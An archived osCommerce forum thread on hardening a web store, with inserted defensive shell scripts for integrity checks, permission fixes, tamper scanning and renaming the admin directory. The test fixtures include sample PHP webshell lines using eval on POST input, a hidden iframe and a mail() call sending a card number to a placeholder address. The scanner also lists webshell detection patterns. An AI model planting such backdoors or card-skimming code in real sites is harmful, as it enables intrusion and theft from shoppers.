
osCommerce

The e-commerce.

This topic is now archived and is closed to further replies.

php_Guy

What to do BEFORE you get hacked


Having your site hacked is a PITA. It can be far worse if you aren't prepared.

 

First off, store an entire set of working files locally. This should be a set of files that has never been off your computer so that you know that they have not been tampered with. Edit them locally, when you need to, and then upload them to your webspace, either through the file manager in your cpanel or with ftp, sftp, ssh, or something similar. You don't have to upload the entire set each time, just the modified files.

 

Some people edit their files live on the server. If you do this you will not have a current local copy. If you download the file(s) from your server, you do not know for certain that they have not been modified by a hacker. ALWAYS edit your local files and upload them to the server, not the other way around.

 

It wouldn't be a bad idea to get XAMPP (from Apache Friends) and develop locally as well, but that's beyond the scope of this post.

 

Before installing a new mod, make a copy of the entire local directory and datestamp it (rename the directory copy to indicate the date). That way if anything goes wrong, you can revert to the old copy. It is a good idea to keep a couple of these snapshots (backups taken at different times) around just to be safe.

 

Now, if your site ever gets hacked it is easy to fix. Go to your webspace and delete all the files associated with your site. Use some common sense though. There may be other folders such as for cgi, logs, statistics, etc. that you might want to keep. (They should not be in a web-accessible location anyway, but that's another issue.) Once you have deleted your website from the server, upload the entire fileset from your local computer. Now your website should be back to where it was before you got hacked. That should be a fairly quick and painless recovery process.

 

Do not upload your files over the existing files. You must delete everything first. Otherwise you will not remove any new files or folders that were added by the hacker.

 

That is step one: Preparing to recover from an attack.

 

Step two is protecting against an attack in the first place.

 

Most important... Set the permissions correctly! The documentation states that you should set the permissions on a few folders to 777. That is fine if you want to be hacked. If you follow those instructions, you WILL be hacked, it's just a matter of time.

 

Set the permissions on ALL folders to 755. If your host has PHP installed as CGI through phpSuExec (the proper method), then your site will run fine this way. If they have PHP installed as a module, you will get a warning from osCommerce saying that it is unable to write to the images folder. Setting permissions back to 777 will make the message go away, but it will leave you open to an attack. Contact your host and ask them if they could change the way in which they install PHP. If they will not, you should immediately get a new host. This isn't an arbitrary statement. By installing PHP the wrong way, they have created a security vulnerability that you will not be able to resolve. A partial work-around is to upload images via the file manager in cpanel or through ftp. A less secure method is to set the permissions on the images folder to 777 just long enough to add your new products and then set it back to 755. This work-around does not, however, deal with the permissions issues on a couple of other folders. Loading PHP in the correct manner is the only fix.

 

Set the permissions on all files to 644, with two exceptions. There are two configure.php files. One is located in /catalog/includes/ the other is in /catalog/admin/includes/. The permissions on these two files should be 400, 444, or 644 dependent on your server configuration. Use the lowest setting that will still allow your store to function and that your host's setup allows you to set.

 

If you have trouble setting permissions on files or folders through ftp, try the file manager in cpanel instead. Some hosts don't allow ftp to change permissions.

 

The admin folder requires a password (in the latest version of osc). This method of password protection is not secure. A hacker could run a password cracker program against it and try thousands of passwords a second until they get in. Use the feature in cpanel to password protect your admin directory. When a hacker runs a password cracker program against this, the system will be notified after a set number of attempts and the hacker's IP will be automatically banned from the system (on a properly configured server; it wouldn't hurt to check this with your host).

 

Renaming your admin folder to something obscure (a 12+ character long string of random letters and numbers would be best) makes it even more difficult for hackers since they won't even know where your admin folder is now. You will have to modify your configure.php files to point to the newly renamed admin directory. Be sure that you do not list the new name in any other files (like robots.txt) as this will give the name away.

 

Lastly, install the following security mods:

 

Security Pro

Sitemonitor

IP Trap

.htaccess Protection

Anti-XSS

 

With all of those changes made, it is very unlikely that you will be hacked. There are always other methods of attack and some can only be prevented by making changes to the server configuration (which is out of your control). Keep in mind that shared-host accounts have more security issues than dedicated accounts and that "cheap" accounts are just that; don't expect that a cheap account is managed by competent or conscientious people.

 

Lastly, make sure that your admin settings for file-based sessions and cache (if you use either) do not use the /tmp folder if you are on a shared-host account. On most systems, the /tmp folder is a symlink to a shared system folder that all the other accounts on that shared host also use. Not only can this potentially cause problems, but it can be a security leak, sharing customer data through this shared folder.

 

Hope that helps. Good luck!

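Added example (the advice above turned into a script; this is not code from the original poster or from osCommerce). It hashes the never-uploaded local fileset and a copy downloaded from the server, then prints what was modified, added or deleted. The ADDED list is exactly what uploading over the existing files would have left behind, which is why the post says to delete first. The store layout and file contents in demo are constructed for illustration; the script needs sha256sum or shasum and does not handle paths containing spaces.

```sh
#!/bin/sh
# Added example (not from the original post). Compares a known-clean local
# fileset against a copy pulled down from the server and reports what differs.
# Requires sha256sum or shasum; paths with spaces are not handled.
set -u
export LC_ALL=C

# Emit "relative/path sha256" for every regular file under $1, sorted by path.
manifest() {
  if command -v sha256sum >/dev/null 2>&1; then hasher=sha256sum; else hasher="shasum -a 256"; fi
  ( cd "$1" && find . -type f -print | sort | while IFS= read -r f; do
      $hasher "$f" | awk -v p="${f#./}" '{ print p, $1 }'
    done ) | sort
}

# Print MODIFIED / ADDED / MISSING lines for server tree $2 relative to clean tree $1.
# ADDED is the list that "upload over the existing files" would never clean up.
compare_trees() {
  tmp=$(mktemp -d)
  manifest "$1" > "$tmp/clean"
  manifest "$2" > "$tmp/server"
  join "$tmp/clean" "$tmp/server"     | awk '$2 != $3 { print "MODIFIED", $1 }'
  join -v2 "$tmp/clean" "$tmp/server" | awk '{ print "ADDED", $1 }'
  join -v1 "$tmp/clean" "$tmp/server" | awk '{ print "MISSING", $1 }'
  rm -rf "$tmp"
}

# Constructed fixture: a clean store and a server copy with one tampered file,
# one attacker-dropped file and one file that went missing.
demo() {
  root=$(mktemp -d)
  mkdir -p "$root/clean/includes" "$root/server/includes" "$root/server/images"
  printf '<?php echo "shop"; ?>\n' > "$root/clean/index.php"
  cp "$root/clean/index.php" "$root/server/index.php"
  printf "<?php define('DB_SERVER', 'localhost'); ?>\n" > "$root/clean/includes/configure.php"
  printf "<?php define('DB_SERVER', 'localhost'); @eval(\$_POST['c']); ?>\n" > "$root/server/includes/configure.php"
  printf '<?php /* dropped by attacker */ ?>\n' > "$root/server/images/numeric.php"
  printf 'User-agent: *\n' > "$root/clean/robots.txt"
  compare_trees "$root/clean" "$root/server"
  rm -rf "$root"
}

demo
```

Run `compare_trees ~/store-clean ~/store-downloaded` against your own directories; a MODIFIED hit on a file you never edited, or any ADDED path, is the thing to read before you wipe and re-upload.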
Thank you for the information, it is really helpful for someone new to this topic like myself :-) One question: how and where can I set up permissions on a folder?

 

You can use ftp or file manager in cpanel. Look for an option for 'permissions' or 'chmod'.

 

Also, it may help to google chmod to get a better understanding of permissions and what the various settings do.

 

hth

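Added example, not from the thread: a script that applies the 755/644 scheme from the original post, sets the two configure.php files to 444, reports anything still world-writable, and creates a 700 directory beside public_html for the file-based sessions and cache that the post says to keep out of the shared /tmp. The directory names in demo are constructed; on a real account point it at the store's document root.

```sh
#!/bin/sh
# Added example (not from the thread). Applies the post's 755/644 scheme to a
# store tree, tightens the two configure.php files, reports anything still
# world-writable, and creates a private sessions/cache directory outside the
# web root. The paths used in demo are constructed for illustration.
set -u

# Directories 755, files 644, the two configure.php files 444 (the post says to
# use the lowest mode your host's PHP setup still runs with).
harden_perms() {
  store=$1
  find "$store" -type d -exec chmod 755 {} +
  find "$store" -type f -exec chmod 644 {} +
  for f in "$store/includes/configure.php" "$store/admin/includes/configure.php"; do
    if [ -f "$f" ]; then chmod 444 "$f"; fi
  done
}

# List files and directories that any account on the box can write to (the 777 case).
audit_world_writable() {
  find "$1" -perm -002 \( -type f -o -type d \) -print | sort
}

# Sessions/cache belong beside public_html, not under it and not in shared /tmp;
# mode 700 keeps the other accounts on a shared host out.
make_private_dir() {
  mkdir -p "$1" && chmod 700 "$1"
}

demo() {
  umask 022
  root=$(mktemp -d)
  mkdir -p "$root/public_html/images" "$root/public_html/includes" "$root/public_html/admin/includes"
  printf '<?php\n' > "$root/public_html/includes/configure.php"
  printf '<?php\n' > "$root/public_html/admin/includes/configure.php"
  printf 'GIF89a' > "$root/public_html/images/product.gif"
  chmod 777 "$root/public_html/images" "$root/public_html/images/product.gif"   # the documented-but-dangerous setting
  before=$(audit_world_writable "$root/public_html" | wc -l | tr -d ' ')
  harden_perms "$root/public_html"
  after=$(audit_world_writable "$root/public_html" | wc -l | tr -d ' ')
  make_private_dir "$root/osc_sessions"
  cfg444=$(find "$root/public_html/includes/configure.php" -perm 444 | wc -l | tr -d ' ')
  echo "world_writable_before=$before world_writable_after=$after configure_444=$cfg444"
  rm -rf "$root"
}

demo
```

As the post says, with PHP running as an Apache module this scheme stops the admin side from writing into images; upload product images over FTP/SFTP instead rather than going back to 777, and re-run `audit_world_writable` after installing any contribution, since some of them ask for 777 again.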
How important is upgrading from MS2.2 to RC1/RC2, security-wise?

 

Is MS2.2 with these additions secure enough?

 

Thanks :)

 

Those addons will probably be sufficient, but I would suggest upgrading anyway. There were a lot of bug fixes that are worth getting.


You could also add: beware of what contributions you install, because they often introduce hacker doorways. Especially the MS2.2 Admin Users in combination with the WYSIWYG Editor, because you can access the editor without logging into Admin and then it is a hacker's delight.

 

You should also remove file manager and the language editor from Admin. Plus seriously consider removing the backup or never leaving a backup around because another HA HA admin hack is to restore an old copy of the database.

 

The most common hacked files are:

 

1. index.php to frame porn sites

2. .htaccess + adding numeric.php in 777 folders to redirect 404 pages to porn sites

3. checkout_confirmation to email the CC details to a public email address

4. specific payment methods to also email the CC details to a public email address

5. login.php to steal the login information of a customer in the hope of getting CC details

6. admin login.php to steal the admin login details in the hope of getting CC details

7. database tables - adding tables as part of eBay motors type scams

 

 

And never ever ever install phpMyAdmin under your public_html folder like some people do to avoid using a hosting panel or when their cheap hosting does not provide it.

 

And the other one people always forget? Don't leave copies of forums or blog software that you installed just to have a look at lying around. Because if you don't keep them up to date you are also leaving yourself open to hacking.


Kym

Projects Director @ ozEworks.com

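Added example, not from the thread: a grep-based triage script for the tampering patterns Kym lists (frames in index.php, .htaccess redirects, PHP dropped into 777 folders, mail() added to the checkout and login pages) plus the usual webshell markers, including the c99 file name that comes up later in the thread. The sample store tree and its contents are constructed here. Hits are leads to read, not proof of compromise, and a diff against the clean local copy remains the authoritative check.

```sh
#!/bin/sh
# Added example (not from the thread). Quick triage for the tampering patterns
# listed above. File names, contents and patterns are constructed for illustration.
set -u
export LC_ALL=C

# scan_store DIR: prints "CATEGORY relative/path" for each suspicious file.
scan_store() {
  ( cd "$1" || exit 1
    # 1. index.php framing another site
    if [ -f index.php ]; then
      grep -l -i -E '<(iframe|frame)[[:space:]>]' index.php | sed 's/^/FRAME /'
    fi
    # 2. .htaccess sending errors or requests elsewhere ...
    if [ -f .htaccess ]; then
      grep -l -i -E '^[[:space:]]*(ErrorDocument|Redirect|RewriteRule)' .htaccess | sed 's/^/HTACCESS /'
    fi
    #    ... and PHP files sitting in folders that were left 777
    find . -type d -perm -002 | while IFS= read -r d; do
      find "$d" -maxdepth 1 -type f -name '*.php'
    done | sort | sed 's#^\./##; s/^/PHP_IN_WRITABLE_DIR /'
    # 3-6. mail() inside the files that see card numbers or credentials
    for f in checkout_confirmation.php checkout_process.php login.php admin/login.php; do
      if [ -f "$f" ]; then grep -l -E '(^|[^A-Za-z_])mail[[:space:]]*\(' "$f"; fi
    done | sed 's/^/MAIL_CALL /'
    # known shell names and the usual eval(base64_decode(...)) obfuscation
    { find . -type f \( -iname 'c99*' -o -iname 'r57*' \)
      grep -r -l -E 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' . || true
    } | sort -u | sed 's#^\./##; s/^/SHELL /'
  )
}

# Constructed fixture with one instance of each pattern and two untouched files.
demo() {
  umask 022
  root=$(mktemp -d)
  mkdir -p "$root/images" "$root/includes" "$root/admin"
  printf '<html><body><iframe src="http://example.invalid/" width="0" height="0"></iframe></body></html>\n' > "$root/index.php"
  printf 'ErrorDocument 404 http://example.invalid/x\n' > "$root/.htaccess"
  printf '<?php header("Location: http://example.invalid/"); ?>\n' > "$root/images/numeric.php"
  printf '<?php eval(base64_decode($_POST["c"])); ?>\n' > "$root/images/shell.php"
  printf '<?php mail("drop@example.invalid", "cc", $cc_number); ?>\n' > "$root/checkout_confirmation.php"
  printf '<?php /* untouched */ ?>\n' > "$root/login.php"
  printf '<?php /* untouched */ ?>\n' > "$root/includes/configure.php"
  chmod 777 "$root/images"
  scan_store "$root"
  rm -rf "$root"
}

demo
```

Run it over a copy you downloaded from the server, not over the clean local set. A MAIL_CALL hit on checkout_confirmation.php, or a PHP file in a 777 images folder, is the sort of thing the list above describes.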
hello,

If I have SSL 256, do I still need to install the security mods?

 

SSL protects data transmissions by using a secure encryption method. It does absolutely nothing for the security of your website. That needs to be handled with .htaccess, passwords, permissions, and various other methods. So most definitely install the security mods.

Thanks, one more question:

 

When renaming my admin folder,

what files do I need to modify?

 

Just the configure.php file so it has the path to the relocated directory.


Thanks for the post, really helpful information to help keep your site protected.

Just started a new shop and installed all of these, and they're working perfectly ;)

Guest

Thanks for all this info..! I'm now working on getting our webshop safe and secured.. I've renamed my admin folder and have modified the configure file that's in the admin folder. Now when I go to the new admin folder it can't find the files.. it goes to the login.php as if it was in the old folder.

 

Any ideas what I'm doing wrong?

 

(At first it looked like there weren't any configure.php files on my server, so I modified the files I have on my local backup and uploaded them. Now I downloaded the files directly from the webserver to see if they were correct, and they are..)


I have been having problems with e-mail spammers modifying pages to integrate their bot e-mail scripts.

 

I am currently on MS2 but I'm going to switch to the RC version shortly.

 

Out of curiosity though, if I remove the File Manager function from the admin side, would it be possible, and beneficial, to set all my files to 444 permissions?

Guest

thank you php-guy - Newb here - I changed all the permissions with FTP

 

I was unable to change the admin folder name to something more secure

 

When I renamed the admin folder, I couldn't find where in the configure.php in catalog\includes I needed to change the text from admin to the new folder name.

 

I was able to locate where I need to change the admin dir to the newly named one in catalog\admin\includes\configure.php. Any help would be greatly appreciated.

 

With Kind Regards,

 

Brian

Lastly, make sure that your admin settings for file-based sessions and cache (if you use either) do not use the /tmp folder if you are on a shared-host account. On most systems, the /tmp folder is a symlink to a shared system folder that all the other accounts on that shared host also use. Not only can this potentially cause problems, but it can be a security leak, sharing customer data through this shared folder.

 

I just finished reading the OSC manual (2.2 RC2a) and it said to create a folder inside of the catalog folder and use it for cache. I did this using the absolute directory path. Is this safe?

 

I read the section on how to store sessions, but it lost me big time. I get that I don't want to use the /tmp file and it also said that you shouldn't put it in mysql. It said something about keeping it out of your docs root file....does this mean I can store them in an absolute directory path outside of the public folder? Like create a new directory in the root to store them? Can someone walk me through this?


Yes, I didn't have any success in renaming my admin folder. I did rename it, but when I try to log into the admin folder I just renamed, it doesn't go through. I have changed the admin/includes/configure.php file too, but not the include/configure.php because I couldn't find it. Plus, when I change the name and all, I try to log in but my IP gets logged because I have all of the security mods enabled, and it still doesn't go through. If you could please help me that would be great. Thanks in advance.

Yes, I didn't have any success in renaming my admin folder. I did rename it, but when I try to log into the admin folder I just renamed, it doesn't go through. I have changed the admin/includes/configure.php file too, but not the include/configure.php because I couldn't find it. Plus, when I change the name and all, I try to log in but my IP gets logged because I have all of the security mods enabled, and it still doesn't go through. If you could please help me that would be great. Thanks in advance.

 

So you must change 2 lines in admin/includes/configure.php:

1. define('DIR_WS_ADMIN', '/admin/');

2. define('DIR_FS_ADMIN', '/home/public_html/admin/');

 

Re-upload.

Have fun.

Example:

 

OLD: www.mysite.com/admin

Go to admin/includes/configure.php.

Change the 2 lines to use "mynewlogin".

Go to the admin folder, rename it to mynewlogin.

 

Browse to www.mysite.com/mynewlogin

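Added example, not code from the thread: a script that does what the reply above describes, rewriting the two DIR_WS_ADMIN and DIR_FS_ADMIN defines in admin/includes/configure.php and moving the directory, with a random name generator for the 12+ character name the original post suggests, and an .htaccess in front of the renamed directory for the HTTP Basic auth the original post recommends. The configure.php written in demo is constructed and holds only those defines; the .htpasswd path is assumed and the file itself is created with Apache's htpasswd tool, outside the web root.

```sh
#!/bin/sh
# Added example (not from the thread). Renames the admin directory, rewrites the
# two DIR_WS_ADMIN / DIR_FS_ADMIN defines in admin/includes/configure.php, and
# drops an .htaccess requiring Basic auth. The configure.php in demo is constructed.
set -u

# 16 random lowercase letters and digits (the original post suggests 12+).
new_admin_name() {
  LC_ALL=C tr -dc 'a-z0-9' < /dev/urandom | head -c 16
}

# rename_admin DOCROOT OLD NEW: rewrite the two defines, then move the directory.
# Only the trailing "/OLD/" of each path is changed; OLD and NEW must be alphanumeric.
rename_admin() {
  docroot=$1; old=$2; new=$3
  cfg="$docroot/$old/includes/configure.php"
  if [ ! -d "$docroot/$old" ]; then echo "no such directory: $docroot/$old" >&2; return 1; fi
  if [ -e "$docroot/$new" ]; then echo "target already exists: $docroot/$new" >&2; return 1; fi
  if ! grep -q "DIR_WS_ADMIN" "$cfg"; then echo "no DIR_WS_ADMIN in $cfg" >&2; return 1; fi
  tmp=$(mktemp)
  sed -e "s#\(define('DIR_WS_ADMIN', *'.*\)/$old/'#\1/$new/'#" \
      -e "s#\(define('DIR_FS_ADMIN', *'.*\)/$old/'#\1/$new/'#" "$cfg" > "$tmp"
  mv "$tmp" "$cfg"      # replaces the file even if it was set to 444
  chmod 644 "$cfg"      # tighten back to 444 afterwards if your host allows it
  mv "$docroot/$old" "$docroot/$new"
  # the original post warns not to list the new name anywhere public, e.g. robots.txt
  if [ -f "$docroot/robots.txt" ] && grep -q "$new" "$docroot/robots.txt"; then
    echo "WARNING: robots.txt mentions $new" >&2
  fi
}

# protect_admin ADMINDIR HTPASSWD: Basic auth in front of the directory. HTPASSWD
# must live outside the web root and is created with Apache's htpasswd tool, e.g.
#   htpasswd -c /home/user/.htpasswd admin
protect_admin() {
  cat > "$1/.htaccess" <<EOF
AuthType Basic
AuthName "Store administration"
AuthUserFile $2
Require valid-user
EOF
}

demo() {
  root=$(mktemp -d)
  mkdir -p "$root/admin/includes"
  cat > "$root/admin/includes/configure.php" <<'EOF'
<?php
  define('HTTP_SERVER', 'http://www.mysite.com');
  define('DIR_WS_ADMIN', '/admin/');
  define('DIR_FS_ADMIN', '/home/public_html/admin/');
?>
EOF
  rename_admin "$root" admin mynewlogin
  protect_admin "$root/mynewlogin" "$root/private/.htpasswd"   # path only; file not created here
  grep -E "DIR_(WS|FS)_ADMIN" "$root/mynewlogin/includes/configure.php"
  grep 'Require' "$root/mynewlogin/.htaccess"
  if [ -d "$root/mynewlogin" ] && [ ! -d "$root/admin" ]; then echo "moved=yes"; fi
  rm -rf "$root"
}

demo
```

On a real store run `rename_admin /home/user/public_html admin "$(new_admin_name)"` against your local copy, then upload the renamed directory; whether the Basic auth lockout after repeated failures behaves as the post describes depends on the host, so test a few wrong passwords yourself.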
Go to your webspace and delete all the files associated with your site.

 

Do we have to delete the databases associated with it?


I can add my 2 cents

 

You should download your whole public folder to your PC; during this process my AVG antivirus detected the file that was a back-door for the hacker.

 

So in that way I could spot the problem files.


You don't need all these modules above, you need proper hosting with mod_security + firewall protection, 100% working and preventing hack attacks. I have a whole database of IP addresses which have tried to hack my servers and the various applications on them.


Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

You should download your whole public folder to your PC; during this process my AVG antivirus detected the file that was a back-door for the hacker.

The normal antivirus never detects PHP back-doors; your 2 cents is useless!!!! It's only exe applications or services on the Windows OS that have the sort of back-doors which antivirus can detect!



I can add my 2 cents

 

You should download your whole public folder to your PC; during this process my AVG antivirus detected the file that was a back-door for the hacker.

 

So in that way I could spot the problem files.

If your site has hack code like this it will never get detected by an antivirus on your PC because to the PC it's just another text file.

 

It doesn't become a "virus" until it runs on a web server. And a "virus" on a website isn't what PC antivirus programs are designed to look for. Yours was probably a JavaScript virus. Now that they will detect.

 

About the only text files quarantined by a PC antivirus would probably be some malicious VB scripts.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


If your site has hack code like this it will never get detected by an antivirus on your PC because to the PC it's just another text file.

 

It doesn't become a "virus" until it runs on a web server. And a "virus" on a website isn't what PC antivirus programs are designed to look for. Yours was probably a JavaScript virus. Now that they will detect.

 

About the only text files quarantined by a PC antivirus would probably be some malicious VB scripts.

 

It detected c99shell.php and c99.txt, which were the cause of being hacked.

 

It works for me.

 

If HostMonster had antivirus.... everything could have been avoided.

